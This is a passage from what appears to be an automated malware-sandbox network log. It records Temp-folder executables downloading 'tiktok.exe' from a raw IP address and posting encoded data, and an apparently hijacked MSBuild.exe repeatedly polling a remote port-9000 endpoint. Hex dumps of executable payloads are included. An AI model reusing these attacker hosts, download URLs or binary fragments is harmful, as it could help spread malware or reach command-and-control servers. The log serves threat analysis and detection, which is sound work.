00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@@Boole
Apr 25, 2024 12:16:14.541913986 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 25, 2024 12:16:14.541961908 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 25, 2024 12:16:14.541980028 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 25, 2024 12:16:14.542035103 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 25, 2024 12:16:14.542092085 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 25, 2024 12:16:14.542109966 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 25, 2024 12:16:14.542165995 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 25, 2024 12:16:14.542182922 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 25, 2024 12:16:14.542200089 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 25, 2024 12:16:14.749494076 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	20.157.87.45	80	6460	C:\Users\user\AppData\Local\Temp\u5g0.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:18.852008104 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 25, 2024 12:16:19.061465979 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 25, 2024 12:16:19.263067007 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb7 date: Thu, 25 Apr 2024 10:16:18 GMT set-cookie: SERVERID=svc7; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	185.172.128.203	80	5408	C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:36.820492029 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 25, 2024 12:16:37.027031898 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 10:16:36 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 60 bc 47 00 e8 ab 56 05 00 68 ff be Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B`GVh
Apr 25, 2024 12:16:37.027112007 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 25, 2024 12:16:37.027127981 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 25, 2024 12:16:37.027206898 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
Apr 25, 2024 12:16:37.027252913 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 25, 2024 12:16:37.027287006 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 25, 2024 12:16:37.027369022 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 25, 2024 12:16:37.027386904 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
Apr 25, 2024 12:16:37.027431965 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 25, 2024 12:16:37.027458906 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 25, 2024 12:16:37.233700991 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	20.157.87.45	80	6460	C:\Users\user\AppData\Local\Temp\u5g0.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:36.940637112 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 25, 2024 12:16:37.149691105 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 25, 2024 12:16:37.347450018 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb7 date: Thu, 25 Apr 2024 10:16:36 GMT set-cookie: SERVERID=svc7; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49763	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:51.759637117 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:52.002419949 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49764	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:52.350850105 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:53.047152996 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49765	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:53.401896000 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:53.667335987 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49767	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:54.037220001 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:54.571734905 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49768	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:54.933017015 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:55.219671965 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49769	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:55.583414078 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:16:56.294637918 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:16:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49770	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:56.653491974 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
